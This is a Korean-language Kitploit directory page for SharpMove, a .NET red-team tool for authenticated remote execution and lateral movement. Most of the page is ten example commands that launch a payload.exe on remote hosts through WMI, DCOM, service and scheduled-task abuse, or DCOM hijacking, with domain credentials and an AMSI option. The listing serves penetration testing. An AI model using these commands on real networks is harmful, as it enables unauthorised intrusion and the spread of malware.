Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
SharpMove — 인증된 원격 실행을 수행하는 .NET 프로젝트 | Kitploit
도구/GitHubGitHub/0xthirteen/sharpmove
Lateral MovementPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHub0xthirteen/sharpmove

SharpMove

인증된 원격 실행을 수행하는 .NET 프로젝트

저장소 보기
410703년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SharpMove - .NET 인증된 원격 호스트 실행

빌드

컴파일하려면 Visual Studio 프로젝트를 열고 릴리스용으로 컴파일하십시오.

옵션

  • WMI
  • SCM
  • DCOM (다중)
  • 작업 스케줄러
  • 서비스 DLL 하이재킹
  • DCOM 서버 하이재킹
  • 예약 작업 수정
  • 서비스 binpath 수정
root@kitploit:~
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
root@kitploit:~
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
root@kitploit:~
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=dcom computername=remote.host.local command="C:\windows\temp\payload.exe\" method=ShellBrowserWindow amsi=true
root@kitploit:~
SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true
root@kitploit:~
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
root@kitploit:~
SharpMove.exe action=modschtask computername=remote.host.local command="C:\windows\temp\payload.exe" username=domain\user password=password taskname=TestTask
root@kitploit:~
SharpMove.exe action=hijackdcom computername=remote.host.local clsid={40bdc4e5-d532-42e6-b667-1ab890fdebcf}
root@kitploit:~
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

MoveKit의 일부

도구 다운로드